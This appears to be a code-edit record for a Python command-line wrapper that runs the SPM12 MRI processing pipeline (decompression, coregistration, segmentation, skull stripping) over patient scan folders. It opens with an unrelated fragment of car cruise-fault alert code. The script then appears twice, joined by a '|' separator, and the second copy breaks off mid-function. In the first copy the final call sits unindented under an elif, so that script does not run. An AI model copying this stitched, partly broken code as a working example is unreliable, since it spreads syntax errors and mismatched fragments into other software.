ET.PERMANENT: NormalPermanentAlert("Cruise Fault: Restart the car to engage"),
ET.NO_ENTRY: NoEntryAlert("Cruise Fault: Restart the Car"),
},
}
|
import os,re,glob,sys,argparse,tempfile
from subprocess import Popen, PIPE, run, TimeoutExpired, DEVNULL
import datetime,shlex,time
import nibabel, nibabel.processing
import gzip, shutil
from copy import deepcopy
import sys
# Guard: the script relies on Python-3-only features (f-strings, required subparsers).
if sys.version_info[0] < 3:
    raise Exception("Python 3.0+ is needed.")
# ---- Command-line interface -------------------------------------------------
# One subcommand per pipeline stage: convert / gunzip / resample / run.
# Each subparser stores its own name in args.command via set_defaults.
parser=argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter, description="A script to execute spm12 at command line.")
# Positional argument : command
subparsers=parser.add_subparsers(metavar= 'command', required = True)
# 'convert': rewrite an SPM .m batch template so it can run non-interactively.
parser_convert = subparsers.add_parser('convert', help='convert .m script into commandline-available script.', formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser_convert.set_defaults(command = 'convert')
parser_convert.add_argument('m_script', type=str, help='m script file to convert.')
parser_convert.add_argument('output', type=str, help='output file path.')
# 'gunzip': decompress .nii.gz images found under a root folder.
parser_gunzip = subparsers.add_parser('gunzip', help='gunzip nii.gz files.', formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser_gunzip.set_defaults(command = 'gunzip')
parser_gunzip.add_argument("root_folder", help="root folder to search mri files.")
parser_gunzip.add_argument("patient_id", default = 'all', help="Patient ID.", nargs='*')
parser_gunzip.add_argument("-s", "--scan-types", default = ['t1', 't1ce', 't2', 'flair', 'seg'],
                    help="A list of available image scan types.(e.g. -s t1ce t2 seg) The last element of this should be 'seg'. Otherwise it will malfunction.",
                    type=str, nargs='+')
# 'resample': resample a single NIfTI image to a given voxel size.
parser_resample = subparsers.add_parser('resample', help='resample a mri image.', formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser_resample.set_defaults(command = 'resample')
parser_resample.add_argument('input_path', type=str, help='nii file to resample.')
parser_resample.add_argument('-vs', "--voxel_size", default=[1,1,1], type=int, help='voxel size(e.g. -vs 2 2 2)', nargs='+')
# 'run': the whole SPM12 pipeline (gunzip -> coregister -> segment -> imgcalc -> gzip).
parser_run = subparsers.add_parser('run', help='run spm12 process pipeline.', formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser_run.set_defaults(command = 'run')
parser_run.add_argument("root_folder", help="root folder to search mri files.")
parser_run.add_argument("patient_id", default = 'all', help="Patient ID.", nargs='*')
parser_run.add_argument("-s", "--scan-types", default = ['t1', 't1ce', 't2', 'flair', 'seg'],
                    help="A list of available image scan types.(e.g. -s t1ce t2 seg) The last element of this should be 'seg'. Otherwise it will malfunction.",
                    type=str, nargs='+')
parser_run.add_argument("-m", "--m-script-archive", default = "/data/eck/CustomScriptsArchive/spm12_scripts",
                    help="m-script-archive.",
                    type=str, nargs='?')
parser_run.add_argument("-rs", "--resample", action="store_true",
                    help="Whether you want to include resampling step in the run process.",
                    )
parser_run.add_argument("-ar", "--affine-regularisation", help="ICBM European brains:mni, ICBM east asian:eastern, Average sized template:subj, default no affine regularisation(empty string)", nargs='?', default='')
# Options on the main parser; on the command line these must precede the
# subcommand name (the child invocation below passes -l before 'run').
parser.add_argument("--mcr-path", default = "/data/eck/software/MCR/v97",
                    help="m-script-archive.",
                    type=str, nargs='?')
parser.add_argument("-l", "--log-file", default = f'''spm12_cmdline_{datetime.datetime.now().strftime('%y%m%d')}.log''',
                    help="log file.",
                    type=str, nargs='?')
# parser_b = subparsers.add_parser('b', help='b help')
# parser_b.add_argument('--baz', choices='XYZ', help='baz help')
args=parser.parse_args()
### Create Logger
# crispy13 is a project-local helper package; the custom excepthook routes
# uncaught exceptions into the same log file as ordinary log records.
from crispy13 import create_logger
logger = create_logger(file_handler_path = args.log_file)
from crispy13.core.ecf import cus_excepthook
sys.excepthook=cus_excepthook(logger)
logger.info(args)
### Input dict functions
def if_found_return_groups(pattern, iterable, group_index = None, flags = 0):
    """Collect regex capture results from every matching item of *iterable*.

    For each item that matches *pattern* (via re.search), appends either the
    full groups() tuple (when *group_index* is None) or the single group
    selected by *group_index*.  Non-matching items are skipped.
    """
    matches = []
    for item in iterable:
        found = re.search(pattern, item, flags = flags)
        if not found:
            continue
        if group_index is None:
            matches.append(found.groups())
        else:
            matches.append(found.group(group_index))
    return matches
class spm12_input_dict:
    """Discover MRI image files for patients under a root folder.

    The result is exposed via ``self.values`` as a nested dict:
    ``{patient_id: {scan_date: {scan_type: file_path}}}``.

    Parameters
    ----------
    root_folder : str
        Folder searched recursively for image files.
    img_types : list[str]
        Scan types to collect (e.g. ['t1ce', 't1', 't2', 'flair', 'seg']).
    pid : 'all' | list[str] | int | None
        Patient id(s); 'all' collects every 8-digit id found on disk.
    file_extension : str
        File suffix to search for (e.g. '.nii' or '.nii.gz').
    """
    def __init__(self, root_folder, img_types, pid = None, file_extension = ".nii"):
        self.root_folder = os.path.abspath(root_folder)
        self.img_types = img_types
        self.file_extension = file_extension
        self.fep = re.sub("\.", "\\.", file_extension) # file_extension_pattern (dots escaped for regex use)
        self.set_input_dict(root_folder, img_types, pid)
    def __str__(self):
        return self.values.__str__()
    def __repr__(self):
        return self.values.__repr__()
    def set_input_dict(self, root_folder, img_types, pid):
        """Populate ``self.pid`` and ``self.values`` by scanning the filesystem.

        Raises ValueError when no candidate files (or no unambiguous file per
        scan type) can be found for a patient/date.
        """
        root_folder = os.path.abspath(root_folder)
        tfl1 = glob.glob(f"{root_folder}/**/*{self.file_extension}", recursive = True) # temp file list 1
        # modify pid variable: 'all' -> every 8-digit id found; int -> one-element list.
        if (pid == 'all') or (pid == ['all']):
            pid = set(if_found_return_groups("[0-9]{8}", tfl1, 0))
        elif isinstance(pid, int):
            pid = [str(pid)]
        elif pid is None:
            raise ValueError(f"pid should be given.")
        self.pid = pid
        input_dict = dict.fromkeys(self.pid)
        for i in input_dict:
            gr1 = glob.glob(f"{root_folder}/**/{i}/**/*{self.file_extension}", recursive = True)
            if len(gr1) == 0: raise ValueError(f"gr1 has nothing. {i}\n{gr1}")
            # Unless explicitly searching for processed "_final" files, drop SPM
            # intermediates (r*/m*/c*/mean* prefixes), masks and final products.
            if re.search("_final.nii", self.file_extension) is None:
                gr1 = list(filter(lambda x:re.search("/(?:[rmc]{1,2}|mean).*" + self.fep, x) is None, gr1))
                gr1 = list(filter(lambda x:re.search("/[^\n/]*mask" + self.fep, x, re.I) is None, gr1))
                gr1 = list(filter(lambda x:re.search("/.*_final" + self.fep, x) is None, gr1))
            else:
                pass
            if len(gr1) == 0: raise ValueError(f"gr1_2 has nothing. {i}\n{gr1}")
            # Scan dates appear as YYYY-MM-DD / YYYYMMDD folders below the patient id.
            ifr1 = set(if_found_return_groups("[0-9]{8}/([0-9]{4}[-]?[0-9]{2}[-]?[0-9]{2})", gr1, group_index = 1))
            if len(ifr1) == 0: raise ValueError(f"ifr1 has nothing. {i}\nifr1:{ifr1}\ngr1:{gr1}")
            input_dict[i] = dict.fromkeys(ifr1)
            for j in input_dict[i]:
                td = {}
                for t in img_types:
                    # BUGFIX: compute tt for every scan type.  Previously it was only
                    # assigned in the non-'seg' branch, so building the error message
                    # in the 'seg' branch could raise NameError and mask the real error.
                    tt = 't1' if t == 't1ce' else t
                    if t != 'seg':
                        tl = if_found_return_groups("^((?!roi|seg|label|RL).)*$",
                                                    if_found_return_groups(f"{root_folder}(?:/[^/\n]+)*/{i}/{j}/{t}/[^/\n]*{self.fep}", gr1, 0, re.I),
                                                    0,
                                                    re.I)
                        if len(tl) == 1:
                            td[t] = tl[0]
                        else:
                            raise ValueError(f"The number of found paths is not one. {tl} {i} {j} {t} {tt} {gr1}")
                    else:
                        # Segmentation files live directly under the date folder and
                        # carry roi/seg/label somewhere in their name.
                        tl = if_found_return_groups(f"{root_folder}(?:/[^/\n]+)*/{i}/{j}/[^/\n]*(?:roi|seg|label)[^/\n]*{self.fep}", gr1, 0, re.I)
                        if len(tl) == 1:
                            td[t] = tl[0]
                        else:
                            raise ValueError(f"The number of found paths is not one. {tl} {i} {j} {t} {tt} {gr1}")
                input_dict[i][j] = td
        self.values = input_dict
### Gunzip functions
def flatten_dict(d):
    """Collapse a nested dict into a single level, joining keys with '_'.

    A dict value is flattened recursively; a list value is treated as a list
    of dicts and every element is flattened into the same level.
    Adapted from:
    https://stackoverflow.com/questions/52081545/python-3-flattening-nested-dictionaries-and-lists-within-dictionaries
    """
    flat = {}
    for key, val in d.items():
        nested = [val] if isinstance(val, dict) else val
        if isinstance(nested, list):
            for sub in nested:
                for inner_key, inner_val in flatten_dict(sub).items():
                    flat[key + '_' + inner_key] = inner_val
        else:
            flat[key] = val
    return flat
def gunzip_nii_gz_files(root_folder, scan_types, patient_id):
    """Decompress every matching .nii.gz image under *root_folder* into a .nii sibling."""
    gz_index = spm12_input_dict(root_folder, scan_types, patient_id, ".nii.gz")
    gz_index.values = flatten_dict(gz_index.values)
    for src in gz_index.values.values():
        dst = re.sub("\.nii\.gz", ".nii", src)  # same path, .nii suffix
        logger.info(f"Gunzip {src} to {dst} ...")
        with gzip.open(src, 'r') as compressed, open(dst, 'wb') as raw:
            shutil.copyfileobj(compressed, raw)
    logger.info(">>> Gunzip complete.")
def gzip_nii_files(root_folder, scan_types, patient_id, nii_file_pattern = "_final.nii"):
    """Compress .nii files matching *nii_file_pattern* under *root_folder* into .nii.gz siblings."""
    nii_index = spm12_input_dict(root_folder, scan_types, patient_id, nii_file_pattern)
    nii_index.values = flatten_dict(nii_index.values)
    for src in nii_index.values.values():
        dst = re.sub("\.nii", ".nii.gz", src)  # same path, .nii.gz suffix
        logger.info(f"Gzip {src} ...")
        with open(src, 'rb') as raw, gzip.open(dst, 'wb') as compressed:
            shutil.copyfileobj(raw, compressed)
    logger.info(">>> Gzip complete.")
### Convert Functions
def convert_mscript(process, inputs):
    """Instantiate an SPM12 .m batch template with concrete input paths.

    Reads ``{args.m_script_archive}/{process}.m``, substitutes the template's
    placeholder file lists with *inputs*, wraps the result in the boilerplate
    needed for unattended batch execution and writes it to a temp ``.m`` file.

    Parameters
    ----------
    process : str
        Template name: 'realignment', 'coregistration', 'segment',
        'segment_only_t1_cleanup', 'segment_only_t1_no-cleanup',
        'imgcalc' or 'imgcalc_mask'.  NOTE(review): any other value leaves
        ``ir`` unbound and raises NameError below.
    inputs : list[str]
        Image paths; their meaning depends on the template.

    Returns
    -------
    str
        Path of the generated .m script (caller is expected to delete it).
    """
    # MATLAB cell arrays want single-quoted paths.
    inputs = list(map(lambda x:f"'{x}'", inputs))
    with open(f"{args.m_script_archive}/{process}.m", 'r') as f:
        contents = f.read()
    logger.info(f"Before converting script:\n{contents}\n")
    # Edit Realignment script; inputs will be T1 + seg or T2.
    if process == 'realignment':
        inputs_string = '\n' + '\n'.join(inputs) + '\n'
        ir = re.sub("\{[^{]*'.+'[^}]*\}", f"{{{inputs_string}}}", contents)
        logger.info("Below the if realignment sentence constructure")
    # Edit Coregistration script; inputs are [reference, source, *others].
    if process == 'coregistration':
        ir = re.sub("(\.ref = ){'.+'}", f"\g<1>{{{inputs[0]}}}", contents)
        ir = re.sub("(\.source = ){'.+'}", f"\g<1>{{{inputs[1]}}}", ir)
        if len(inputs) > 2:
            try:
                input_strings = '\n' + '\n'.join(inputs[2:]) + '\n'
                ir = re.sub("(\.other = ){'.*'}", f"\g<1>{{{input_strings}}}", ir)
            except IndexError:
                pass
        logger.info("Below the if coregistration sentence constructure")
    # Edit segment script; one input per .channel(N).vols entry.
    if process == 'segment':
        ir = contents
        for i in range(len(inputs)):
            # BUGFIX: the pattern's inner quotes must be single quotes; a bare
            # double quote here terminated the surrounding f-string (SyntaxError).
            ir = re.sub(f"(\.channel\({i+1}\).vols = ){{'.+'}}", f"\g<1>{{{inputs[i]}}}", ir)
        ir = re.sub(f"(\.affreg = )'mni'", f"\g<1>'{args.affine_regularisation}'", ir)
        logger.info("Below the if segment sentence constructure")
    if (process == 'segment_only_t1_cleanup') or (process == 'segment_only_t1_no-cleanup'):
        ir = contents
        logger.info("ir = contents")
        # BUGFIX: same quoting repair as above ('...' inside the "..." f-string).
        ir = re.sub(f"(\.channel.vols = ){{'[^\n{{}}]+'}}", f"\g<1>{{{inputs[0]}}}", ir)
        logger.info('''ir = re.sub(f"(\.channel.vols = ){{'[^\n{{}}]+'}}", f"\g<1>{{{inputs[0]}}}", ir)''')
        ir = re.sub(f"(\.affreg = )'mni'", f"\g<1>'{args.affine_regularisation}'", ir)
        logger.info("Below the if segment_only_t1_cleanup sentence constructure")
    # Edit imgcalc mask script; inputs = 4 source images + output name + output dir.
    if process == 'imgcalc_mask':
        inputs_string = '\n' + '\n'.join(inputs[:4]) + '\n'
        ir = re.sub("(\.imcalc.input = )\{(?:[^{]*'.+'[^{]*)*\}", f"\g<1>{{{inputs_string}}}", contents)
        ir = re.sub("(\.imcalc.output = )'.+'", f"\g<1>{inputs[4]}", ir)
        ir = re.sub("(\.imcalc.outdir = ){'.+'}", f"\g<1>{{{inputs[5]}}}", ir)
        logger.info("Below the if img calc mask sentence constructure")
    # Edit imgcalc script; same input layout as imgcalc_mask.
    if process == 'imgcalc':
        inputs_string = '\n' + '\n'.join(inputs[:4]) + '\n'
        ir = re.sub("(\.imcalc.input = )\{(?:[^{]*'.+'[^{]*)*\}", f"\g<1>{{{inputs_string}}}", contents)
        ir = re.sub("(\.imcalc.output = )'.+'", f"\g<1>{inputs[4]}", ir)
        ir = re.sub("(\.imcalc.outdir = ){'.+'}", f"\g<1>{{{inputs[5]}}}", ir)
        logger.info("Below the if img calc sentence constructure")
    # Wrap in the boilerplate SPM needs for non-interactive execution.
    edited_contents = f'''
spm defaults fmri
spm_jobman initcfg
{ir}
spm_jobman('run',matlabbatch);
'''
    logger.info("edited_contents variable was made.")
    logger.info(f"After converting script:\n{edited_contents}\n")
    logger.info(f'''Running {process.upper()} with inputs:{inputs}''')
    # NamedTemporaryFile only reserves a unique name; the actual script is
    # written to "<name>.m" so MATLAB accepts the extension.
    ts_file = tempfile.NamedTemporaryFile(prefix = f"{process}_") # temp script file
    tfn = ts_file.name
    ts_file.close()
    with open(f"{tfn}.m", 'w') as f:
        f.write(edited_contents)
    return f"{tfn}.m"
### Resample functions
def resample_mri(input_path, voxel_size = [1, 1, 1], output_path_modifier = "/\g<1>_resampled\g<2>"):
    """Resample a NIfTI image to *voxel_size* and write the result to disk.

    The output file name is derived from *input_path* with
    *output_path_modifier*, a re.sub replacement template whose groups are
    (basename, extension); the default appends '_resampled' to the basename.
    """
    output_path = re.sub("/([^/\n]+)(\.[^.\n]+?)$", output_path_modifier, input_path)
    logger.info(f"resample_mri: output_path = {output_path}")
    source_image = nibabel.load(input_path)
    resampled = nibabel.processing.resample_to_output(source_image, voxel_size)
    nibabel.save(resampled, output_path)
### Run functions
def _run_m_script(m_script, MCR_path=args.mcr_path):
    """Execute a converted .m script through the SPM12 standalone runner.

    Raises
    ------
    Exception
        If run_spm12.sh exits non-zero; stdout/stderr are logged first.
    """
    cmd1 = f'''run_spm12.sh {MCR_path} script {m_script}'''
    logger.info(f"running the following command:\n{cmd1}")
    # BUGFIX: stderr must be piped as well; without stderr=PIPE communicate()
    # always returns None for it, making the failure log below useless.
    p1 = Popen(shlex.split(cmd1), stdout=PIPE, stderr=PIPE)
    p1_stdout, p1_stderr = p1.communicate()
    if p1.returncode != 0:
        logger.info(f"Stdout:\n{p1_stdout}")
        logger.info(f"Stderr:\n{p1_stderr}")
        logger.info(f"Return code: {p1.returncode}")
        raise Exception(f"Job failed.")
def run_spm12_process(input_dict):
    """Run the SPM12 processing chain for every patient/date in *input_dict*.

    Per (patient, scan date): optional resampling, coregistration of every
    non-t1ce scan onto t1ce, multi-channel segmentation, two T1-only
    segmentations (with and without clean-up) to build brain masks, and
    finally imgcalc-based skull stripping plus mask export.

    Parameters
    ----------
    input_dict : spm12_input_dict
        File index built by spm12_input_dict (checked by class name below).
    """
    if input_dict.__class__.__name__ != spm12_input_dict.__name__: raise ValueError("input_dict should be an instance of spm12_input_dict class.")
    pid = input_dict.pid
    input_data = input_dict.values
    img_types = input_dict.img_types
    for p in pid:
        logger.info(f"Current patient id: {p}.")
        for ts in input_data[p]: # ts = time series (scan date key)
            logger.info(f"MRI Image date: {ts}")
            # run realignment (kept disabled by the original author)
            # for t in img_types[:-1]:
            #     if t == 't1ce':
            #         inputs = [input_data[p][ts][t]]
            #         m_script = convert_mscript("realignment", inputs)
            #         _run_m_script(m_script) # T1 & label realignment
            #         os.remove(m_script)
            #     else:
            #         inputs = [input_data[p][ts][t]]
            #         m_script = convert_mscript("realignment", inputs)
            #         _run_m_script(m_script) # T2 realignment
            #         os.remove(m_script)
            # Optionally resample t1ce (in place) and seg (as "*_final.nii").
            if args.resample is True:
                resample_mri(input_data[p][ts]['t1ce'], voxel_size = [1, 1, 1], output_path_modifier = "/\g<1>\g<2>")
                resample_mri(input_data[p][ts]['seg'], voxel_size = [1, 1, 1], output_path_modifier = "/\g<1>_final\g<2>")
            # Make temp img types (excluding seg), with 't1' moved to the front.
            tit = deepcopy(img_types) #temp img types
            tit.remove('t1')
            tit.insert(0, 't1')
            try:
                tit.remove('seg')
            except:
                logger.info(f"temp img types doesn't have 'seg'.")
            # run coregistration: every non-t1ce scan is registered onto t1ce.
            for t in tit:
                if t == 't1ce':
                    continue
                inputs = [input_data[p][ts]['t1ce'], input_data[p][ts][t]]
                m_script = convert_mscript("coregistration", inputs)
                _run_m_script(m_script) # T1 & T2 coregistration
                os.remove(m_script)
            if img_types[-1] == 'seg':
                shutil.move(input_data[p][ts]['seg'], re.sub("/([^\n/]*)\.nii", "/\g<1>_RL_final.nii", input_data[p][ts]['seg'])) # For consistency of the names of final products.
            # run segment: t1ce used as-is, coregistered scans get the 'r' prefix.
            inputs = []
            for i in range(len(tit)):
                t = tit[i]
                if t == 't1ce':
                    inputs.append(input_data[p][ts][t])
                else:
                    inputs.append(re.sub(f"/([^\n/]+\.nii)", "/r\g<1>", input_data[p][ts][t]))
            # ### lines for resample(not segment)
            # for ri in inputs:
            #     resample_mri(ri, voxel_size = [1, 1, 1], output_path_modifier = "/\g<1>\g<2>")
            # ###
            m_script = convert_mscript("segment", inputs)
            _run_m_script(m_script) # T1 & T2 segment
            os.remove(m_script)
            # Make mask for stripping skull (clean up) from the coregistered T1.
            inputs = [re.sub(f"/([^\n/]+\.nii)", "/r\g<1>", input_data[p][ts]['t1'])]
            logger.info(f"inputs for clean up segment were made.")
            m_script = convert_mscript("segment_only_t1_cleanup", inputs)
            logger.info(f"m_script was made.")
            _run_m_script(m_script) # segment T1 only
            logger.info(f"running m_script complete.")
            os.remove(m_script)
            # Rename c* tissue-class outputs (clean up) so the no-cleanup pass
            # below cannot clobber them.
            cf = re.sub("/[^\n/]+\.nii", "", input_data[p][ts]['t1']) # current folder
            for file in list(filter(lambda x:re.search("cleanup", x) is None, glob.glob(f"{cf}/c*.nii"))):
                nn = re.sub("/(c[0-9])([^\n/]+)\.nii", "/\g<1>\g<2>_cleanup.nii", file) # new name
                shutil.move(file, nn)
                logger.info(f"{file} was renamed to {nn}.")
            # Make mask for stripping skull (no clean up).
            inputs = [re.sub(f"/([^\n/]+\.nii)", "/r\g<1>", input_data[p][ts]['t1'])]
            m_script = convert_mscript("segment_only_t1_no-cleanup", inputs)
            _run_m_script(m_script) # segment T1 only
            os.remove(m_script)
            # Rename c* tissue-class outputs (no clean up).
            cf = re.sub("/[^\n/]+\.nii", "", input_data[p][ts]['t1']) # current folder
            for file in list(filter(lambda x:re.search("cleanup", x) is None, glob.glob(f"{cf}/c*.nii"))):
                nn = re.sub("/(c[0-9])([^\n/]+)\.nii", "/\g<1>\g<2>_no-cleanup.nii", file) # new name
                shutil.move(file, nn)
                logger.info(f"{file} was renamed to {nn}.")
            # run imgcalc (skull stripping): bias-corrected image + c1/c2/c3
            # tissue maps in, "*_BrainExtractionBrain_final.nii" out.
            for i in range(len(tit)):
                t = tit[i]
                if t == 't1ce':
                    inputs = re.sub(f"/([^\n/]+\.nii)", "/m\g<1>", input_data[p][ts][t])
                else:
                    inputs = re.sub(f"/([^\n/]+\.nii)", "/mr\g<1>", input_data[p][ts][t])
                # NOTE: inside this one statement `inputs` is still the source
                # path string; afterwards it is the 6-element imgcalc argument list.
                inputs = [inputs] + [re.sub(f"/([^\n/]+)\.nii", "/c1r\g<1>_cleanup.nii", input_data[p][ts]['t1'])]\
                    + [re.sub(f"/([^\n/]+)\.nii", "/c2r\g<1>_cleanup.nii", input_data[p][ts]['t1'])]\
                    + [re.sub(f"/([^\n/]+)\.nii", "/c3r\g<1>_cleanup.nii", input_data[p][ts]['t1'])]\
                    + [re.sub(f"^.*/([^\n/]+)\.nii", "\g<1>_BrainExtractionBrain_final.nii", inputs)]\
                    + [re.search(f"(^.+)/([^\n/]+\.nii)", inputs).group(1)]
                m_script = convert_mscript("imgcalc", inputs)
                _run_m_script(m_script) # T1 & T2 imgcalc
                os.remove(m_script)
            # Save mask nii file (reuses inputs[0] from the last loop iteration).
            inputs = [inputs[0]] + [re.sub(f"/([^\n/]+)\.nii", "/c1r\g<1>_cleanup.nii", input_data[p][ts]['t1'])]\
                + [re.sub(f"/([^\n/]+)\.nii", "/c2r\g<1>_cleanup.nii", input_data[p][ts]['t1'])]\
                + [re.sub(f"/([^\n/]+)\.nii", "/c3r\g<1>_cleanup.nii", input_data[p][ts]['t1'])]\
                + ["BrainExtractionMask.nii"]\
                + [re.search(f"(^.+)/([^\n/]+\.nii)", input_data[p][ts]['t1ce']).group(1)]
            m_script = convert_mscript("imgcalc_mask", inputs)
            _run_m_script(m_script) # T1 & T2 imgcalc
            os.remove(m_script)
    logger.info(f">> SPM Process complete.")
def run_spm12(root_folder, img_types, pid):
    """Run the whole SPM12 pipeline for the given patients.

    Steps: validate and normalise scan types ('t1ce' first, 'seg' last),
    gunzip the raw .nii.gz images, run the SPM process chain, then gzip the
    final products and the brain mask.
    """
    img_type_ref = ['t1ce', 't1', 't2', 'flair', 'seg']
    # BUGFIX: work on a copy so the caller's list (e.g. args.scan_types) is
    # not reordered in place as a side effect.
    img_types = list(img_types)
    for i in img_types:
        if i not in img_type_ref: raise ValueError(f"Invaild img type. Ref = {img_type_ref}.")
    # Normalise ordering: 'seg' must be last, 't1ce' first.
    if 'seg' in img_types:
        img_types.remove('seg')
        img_types.insert(len(img_types), 'seg')
    if 't1ce' in img_types:
        img_types.remove('t1ce')
        img_types.insert(0, 't1ce')
    gunzip_nii_gz_files(root_folder, img_types, pid)
    input_dict = spm12_input_dict(root_folder, img_types, pid)
    run_spm12_process(input_dict)
    gzip_nii_files(root_folder, img_types, pid, nii_file_pattern = "_final.nii")
    gzip_nii_files(root_folder, ['t1ce'], pid, nii_file_pattern = "Mask.nii")
    logger.info(f">> The whole processes complete.")
def communicate_subprocesses(subpcs, pids, return_code_dict):
    """Poll each child process once and record newly observed return codes.

    Parameters
    ----------
    subpcs : list[subprocess.Popen]
        Child processes, parallel to *pids*.
    pids : list[str]
        Patient ids used as keys of *return_code_dict*.
    return_code_dict : dict
        pid -> last observed return code (None while still running).

    Returns
    -------
    dict
        The same dict, updated in place with any new return codes.
    """
    # BUGFIX: Popen.poll() never raises TimeoutExpired (that exception belongs
    # to wait()/communicate() with a timeout), so the old try/except around it
    # was dead code; poll() simply returns None while the child is running.
    for sp, pid in zip(subpcs, pids):
        rc = sp.poll()
        if rc != return_code_dict[pid]:
            logger.info(f"The return code of process of {pid}: {rc}")
            return_code_dict[pid] = rc
    return return_code_dict
# ---- Subcommand dispatch ----------------------------------------------------
if args.command == 'convert':
    # NOTE(review): convert_mscript(process, inputs) is called here with a
    # script path and an output path, which does not match its signature --
    # verify this subcommand before relying on it.
    convert_mscript(args.m_script, args.output)
    logger.info("Converting process complete.")
elif args.command == 'gunzip':
    gunzip_nii_gz_files(args.root_folder, args.scan_types, args.patient_id)
elif args.command == 'resample':
    resample_mri(args.input_path, args.voxel_size)
elif args.command == 'run':
    logger.info(f"patient id : {args.patient_id}")
    subpcs = []
    args.root_folder = os.path.abspath(args.root_folder)
    args.m_script_archive = os.path.abspath(args.m_script_archive)
    # Several patients (or 'all'): fan out one child process per patient id,
    # each re-invoking this script with a single id and its own log file,
    # then poll every 5 s until all children have reported a return code.
    if (len(args.patient_id) > 1) or (args.patient_id == ['all']):
        if args.patient_id == ['all']:
            pids = set(if_found_return_groups("[0-9]{8}", glob.glob(f"{args.root_folder}/**/*.nii.gz", recursive = True), 0))
            pids = list(pids)
        else:
            pids = args.patient_id
            assert len(args.patient_id) == len(pids), "Found patient ids were not matched to input patient ids."
        os.makedirs(f"{args.root_folder}/spm12_logs", exist_ok=True)
        return_code_dict = dict.fromkeys(pids)  # pid -> return code (None = running)
        for pid in pids:
            logger.info(f'''python {args.m_script_archive}/spm12_cmdline_main.py -l {args.root_folder}/spm12_logs/{pid}_spm12_run.log run {args.root_folder} {pid} -s {' '.join(args.scan_types)}'''.split())
            subpcs.append(
                Popen(f'''python {args.m_script_archive}/spm12_cmdline_main.py -l {args.root_folder}/spm12_logs/{pid}_spm12_run.log run {args.root_folder} {pid} -s {' '.join(args.scan_types)}'''.split(),
                      stdout = DEVNULL, stderr = DEVNULL, cwd = os.getcwd())
            )
        while None in return_code_dict.values():
            return_code_dict = communicate_subprocesses(subpcs, pids, return_code_dict)
            time.sleep(5)
        logger.info(f"Job orders: {pids}")
        logger.info(f"Exit codes: {return_code_dict.items()}")
elif (len(args.patient_id) == 1) and (re.search("[0-9]{8}", args.patient_id[0]) is not None):
run_spm12(args.root_folder, args.scan_types, args.patient_id) | import os,re,glob,sys,argparse,tempfile
from subprocess import Popen, PIPE, run, TimeoutExpired, DEVNULL
import datetime,shlex,time
import nibabel, nibabel.processing
import gzip, shutil
from copy import deepcopy
import sys
# Guard: the script relies on Python-3-only features (f-strings, required subparsers).
if sys.version_info[0] < 3:
    raise Exception("Python 3.0+ is needed.")
# Get Arguments: one subcommand per pipeline stage (convert/gunzip/resample/run);
# each subparser records its own name in args.command via set_defaults.
parser=argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter, description="A script to execute spm12 at command line.")
# Positional argument : command
subparsers=parser.add_subparsers(metavar= 'command', required = True)
# 'convert': rewrite an SPM .m batch template so it can run non-interactively.
parser_convert = subparsers.add_parser('convert', help='convert .m script into commandline-available script.', formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser_convert.set_defaults(command = 'convert')
parser_convert.add_argument('m_script', type=str, help='m script file to convert.')
parser_convert.add_argument('output', type=str, help='output file path.')
# 'gunzip': decompress .nii.gz images found under a root folder.
parser_gunzip = subparsers.add_parser('gunzip', help='gunzip nii.gz files.', formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser_gunzip.set_defaults(command = 'gunzip')
parser_gunzip.add_argument("root_folder", help="root folder to search mri files.")
parser_gunzip.add_argument("patient_id", default = 'all', help="Patient ID.", nargs='*')
parser_gunzip.add_argument("-s", "--scan-types", default = ['t1', 't1ce', 't2', 'flair', 'seg'],
                    help="A list of available image scan types.(e.g. -s t1ce t2 seg) The last element of this should be 'seg'. Otherwise it will malfunction.",
                    type=str, nargs='+')
# 'resample': resample a single NIfTI image to a given voxel size.
parser_resample = subparsers.add_parser('resample', help='resample a mri image.', formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser_resample.set_defaults(command = 'resample')
parser_resample.add_argument('input_path', type=str, help='nii file to resample.')
parser_resample.add_argument('-vs', "--voxel_size", default=[1,1,1], type=int, help='voxel size(e.g. -vs 2 2 2)', nargs='+')
# 'run': the whole SPM12 pipeline (gunzip -> coregister -> segment -> imgcalc -> gzip).
parser_run = subparsers.add_parser('run', help='run spm12 process pipeline.', formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser_run.set_defaults(command = 'run')
parser_run.add_argument("root_folder", help="root folder to search mri files.")
parser_run.add_argument("patient_id", default = 'all', help="Patient ID.", nargs='*')
parser_run.add_argument("-s", "--scan-types", default = ['t1', 't1ce', 't2', 'flair', 'seg'],
                    help="A list of available image scan types.(e.g. -s t1ce t2 seg) The last element of this should be 'seg'. Otherwise it will malfunction.",
                    type=str, nargs='+')
parser_run.add_argument("-m", "--m-script-archive", default = "/data/eck/CustomScriptsArchive/spm12_scripts",
                    help="m-script-archive.",
                    type=str, nargs='?')
parser_run.add_argument("-rs", "--resample", action="store_true",
                    help="Whether you want to include resampling step in the run process.",
                    )
parser_run.add_argument("-ar", "--affine-regularisation", help="ICBM European brains:mni, ICBM east asian:eastern, Average sized template:subj, default no affine regularisation(empty string)", nargs='?', default='')
# Options on the main parser; on the command line these must precede the subcommand.
parser.add_argument("--mcr-path", default = "/data/eck/software/MCR/v97",
                    help="m-script-archive.",
                    type=str, nargs='?')
parser.add_argument("-l", "--log-file", default = f'''spm12_cmdline_{datetime.datetime.now().strftime("%y%m%d")}.log''',
                    help="log file.",
                    type=str, nargs='?')
# parser_b = subparsers.add_parser('b', help='b help')
# parser_b.add_argument('--baz', choices='XYZ', help='baz help')
args=parser.parse_args()
### Create Logger
# crispy13 is a project-local helper package; the custom excepthook routes
# uncaught exceptions into the same log file as ordinary log records.
from crispy13 import create_logger
logger = create_logger(file_handler_path = args.log_file)
from crispy13.core.ecf import cus_excepthook
sys.excepthook=cus_excepthook(logger)
logger.info(args)
### Input dict functions
def if_found_return_groups(pattern, iterable, group_index = None, flags = 0):
    """Return capture data for each element of *iterable* that matches *pattern*.

    Appends m.groups() when *group_index* is None, otherwise m.group(group_index);
    elements without a match contribute nothing.
    """
    results = []
    for text in iterable:
        m = re.search(pattern, text, flags = flags)
        if m is not None:
